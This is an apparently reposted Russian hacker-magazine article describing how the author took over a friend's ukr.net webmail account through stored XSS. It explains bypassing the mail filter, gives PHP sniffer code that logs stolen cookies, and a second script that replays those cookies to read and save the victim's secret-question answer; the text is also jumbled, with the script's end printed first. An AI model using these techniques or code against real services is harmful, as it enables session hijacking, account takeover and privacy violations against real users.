V-zlom.ru » Статьи » Полный захват почтового ящика на ukr.net

Полный захват почтового ящика на ukr.net

');
$length_answ=$answ2-$answ1;
$full_answer=substr($dt,$answ1,$length_answ);
// сохраняем полученный ответ на вопрос в файл: answer.html
$fp1=Fopen("answer.html","a");
fwrite($fp1,"$full_answer
");
fclose($fp1);
fclose($fp);
? >

Код максимум упрощен, но тебе, думаю понятен. Скрипт принимает куки, присланные на него XSS сплойтом, авторизируется под ними, заходит на страницу личных настроек и считывает ответ на секретный вопрос. После, сниффер, сохраняет его в лог файл answer.html. Советую также всегда сохранять в лог переменную $query, на случай, если повезет, и жертва занесет в свои куки пароль.
Также, стоит заметить, что данный скрипт должен находится на сервере, поддерживающем исходящие соединения, так что про бесплатные хостинги можно забыть.

[попытка номер 2 и успешный финал]
Я залил функциональный снифф к себе на хост, заменил в XSS конструкции путь к нему, и по новой отправил письмо. Прошло немного времени, и у меня в логе, уже хранилась заветная запись. Ответ на секретный вопрос, оказалось немного неожиданным. Это было слово: “begemot”. ))
Вот и все. Вот так вот, благодаря своим знаниям в проведении XSS атак, я выиграл спор и получил свою заслуженную награду, чего и тебе, читатель, желаю….))


Пошаговое восстановление пароля

ПОДПИСЬ: полный путь изменение пасса


Полезные ссылки
Хочешь больше понять и разобраться в технологии функционального сниффера? Держи ссылки. Подборка хоть и небольшая, но очень толковая и интересная.
http://antichat.ru/txt/email/
http://antichat.ru/txt/email2/
http://hackzona.ru/hz.php?name=News&file=article&sid=5107&mode=&order=0&thold=0
http://hackzona.ru/hz.php?name=News&file=article&sid=5044&mode=&order=0&thold=0
http://antichat.ru/txt/xakepforum/
http://forum.antichat.ru/thread5899.html



WARNING
Само собой, взлом мыла, да, как и любой взлом, занятие так сказать незаконное, так что всегда следи за своей безопасностью, а еще лучше, вообще не ввязывайся в это. ))

PinkPanther@HackZona.ru


Примечание Цензора: Специально для журнала «Хакер»[03(87)]

Полный захват почтового ящика на www.ukr.net
[ Хакерство в Интернете ]

На сегодняшний день, абсолютно любая бесплатная, да нередко и платная, почта, имеющая веб интерфейс, может быть подвержена XSS нападению. В некоторых случаях найти дырку легче, в некоторых сложнее, некоторые баги лежат в привате, некоторые в паблике, но, тем не менее, они есть. Сегодня, я покажу тебе способ, позволяющий не просто угнать и авторизироватся под сессионными куками почтовика, как это было во всех предыдущих статьях журнала рассказывающих про мыла, а полностью захватить ящик, имхо самого крутого украинского почтового сервера ukr.net.

[intro]
История эта произошла еще в начале зимы, а началась, с моего спора с приятелем. Как-то, завязался у нас разговор насчет хакеров и ИБ в общем, а закончился спором на пару бутылочек пивка, что я смогу поиметь его почту, которая находилась на сервере ukr.net. Почему именно эту почту выбрал мой знакомый, без понятия, но это меня устраивало с головой. Также, я знал, что он проверяет почту через веб интерфейс, да еще и через осел, что опять же было мне на руку. Посему, я сразу же отказался от банальной си, брута, троянинга и т.д., а выбрал мой самый любимый способ-XSS атаку.

[небольшой поверхностный осмотр]
Итак, нужно было пощупать сервис изнутри. Я знал, что когда-то баги там были, но времени прошло уже много, посему, не факт что они еще существовали. Следует, пришлось все проходить заново, хотя в принципе, мне это было, вообще не в напряг, а даже совсем наоборот. Я зарегал себе безпонтовый ящик fackdahack@ukr.net и начал изучать.
Как видишь на скрине, под формой авторизации находится панелька с 2 галочками, которые отвечают за запоминание логина/пасса. По умолчанию они, конечно, не активированы, но кто знает, возможно, мой дружище юзает эту функцию.

Что самое интересное, если активировать запоминание пароля, в куки к нам упадет пароль в открытом виде. Вот тебе и первый просчет разработчиков – никакого шифрования, что стало для меня приятным известием.

Идея была до боли банальной: найти XSS`ку, правильно сформировать скриптовый сплойт, отправить письмо с ним и словить на своем сниффере его кукисы, в которых, при хорошем раскладе, будет находиться пароль в чистом виде. Задумка приевшаяся и простая, но, тем не менее, действующая и более-менее стабильная. Так что, следующим шагом стал поиск XSS.

[в поисках XSS дырок]
Скажу сразу, мне в лом было придумывать свои супер изощренные конструкции, поэтому я решил копать от стандартного, а именно подгружать сценарий через картинку. В моем случае, получился обычный скрипт, такого вида:

где, http://privatesniff/s.php - мой сайт со сниффером s.php, о котором, я расскажу немного ниже.
Но, как и предполагалось, фильтры сработали, и мой код преобразовался вот в такой:

Как видишь, фильтры почтовика были настроены на парсинг таких слов, как: style и javascript, и к ним прибавлялся х. Благо, опыта в данных ситуациях у меня немного есть, и я знаю, что можно обойти практически любой фильтр, как сделал и тут. А решение оказалось элементарным. Чтобы лучше понять суть данного обхода фильтров, советую прочитать мини адвисори небезызвестного Майора: http://forum.antichat.ru/thread8919.html. Вот примерно по тому же принципу, я сделал и тут, преобразовав часть слова javascript в 10-чную кодировку, и получив javascript. А с обходом фильтра на слово style вышло вообще забавно. Нужно было просто убрать пробел перед style и уже после этого, парсер ничего не замечая, пропускал style как style. В итоге, исходный XSS сплойт стал выглядеть так:

Все прокатило. Скриптовая конструкция не парсилась и отлично работала!
Теперь расскажу, что же выступало у меня под s.php. Это обычный php сниффер, код которого, в самом упрощенном варианте, выглядит, например, вот так:

Код php сниффера s.php
// принимаем куки
$query=$_SERVER["QUERY_STRING"];
// записываем полученные значения в файл: log.html
$fp=fopen("log.html","a");
fputs($fp," $query
");
fclose($fp);
? >

Все элементарно. Если неохота самому думать над сниффером, тогда тебе сюда: http://antichat.ru/sniff/
Ты, наверное, также обратил внимание, что в моем скрипте присутствует какой-то 1.gif. Это обычная картинка. Например, в моем случае, это белый жук размером 1*1 пиксел. Хотя можно было бы вообще скрыть ее отображение, но я оставил именно так…

[проведенная атака и первый облом]
Я отправил свой скриптовый сплойт на oleg_chernigov@ukr.net и стал ждать результата. Мне не пришлось даже ничего думать насчет си, потому что я знал, письмо, отправленное с моего адреса, мой кореш откроет без лишних проблем и подозрений. Отправлял я с одного из своих аккаунтов на рамблере, при этом, не забыв выставить опцию отправки в виде html.


ПОДПИСЬ: XSS скрипты надо отправлять только в html формате

Все прошло успешно. Осел моего кореша захавал XSS`ку, и на сниффере я получил такую вот штуку:


ПОДПИСЬ: куки жертвы

Но кукисы, как ты видишь, меня, мягко говоря, обломали, ибо пароля там не было, т.е. выходит, мой кореш не воспользовался запоминанием пароля. Авторизироватся же под полученными куками было уже невозможно, ибо сессия, как я увидел по логу, окончилась несколько часов назад. Да, вот так вот, не успел.((( Посему, созрела идея пойти другим путем, о котором читай ниже.

[функциональный сниффер]
Функциональный сниффер, на сегодняшний день, считается очень прогрессивной технологией, но, не смотря на это, упоминание о ней я все же встречаю не часто. Для лучшего понимания технологии, советую посетить ссылки во врезке, а пока что разберемся с нашим случаем.
Сначала все по порядку. Заглянем в мой fackdahack@ukr.net и пройдемся в пункт «Настройки» --> «Личная информация».


ПОДПИСЬ: еще один просчет разработчиков с ответом на секретный вопрос

Ну что, понял, что я имею ввиду? Нет? Хм…ну да ладно, обрати внимание на поле «Правильный ответ», а ведь это не что иное, как ответ на мой секретный вопрос. Да-да, в открытом виде и доступен для чтения без запроса пароля. Смешно…. Хочу заметить, что бага довольно старая, и я уже не очень рассчитывал на ее существование, ибо думал, что грамотные админы залатали, но, как видишь, не тут то было. Так вот, задача функционального сниффера, в данном случае, как раз и заключается в том, чтоб этот ответ на секретный вопрос украсть.
Где же взять этот сниффер, да еще и чтоб все так красиво работало? Ответ прост, напишем его сами. Для данного случая, код будет выглядеть вот так:

Код функционального php сниффера s.php
//Official HackZona TeaM release
//PinkPanther@HackZona.ru
// принимаем куки и приводим их в нормальный вид
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
// составляем запрос на получение страницы с личной инфой
$header="GET http://e.ukr.net/cgi-bin/userinfo HTTP/1.0rn";
$header.="Referer: http://e.ukr.netrn";
$header.="Cookie: ".$query."rn";
$header.="Host: e.ukr.netrnrn";
// отправляем запрос и считываем страницу настроек
$fp=fsockopen("e.ukr.net", 80);
fwrite($fp, $header);
$dt="";
while (!feof($fp))
$dt.=fread($fp, 1024);
// выдираем из полученной страницы ответ на секретный вопрос
$answ1=strpos($dt,'Password_Answer')+24;
$answ2=strpos($dt,'" size="40">

  • Автор: makar
  • Комментарии: 0
  • Просмотры: 11197
1

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!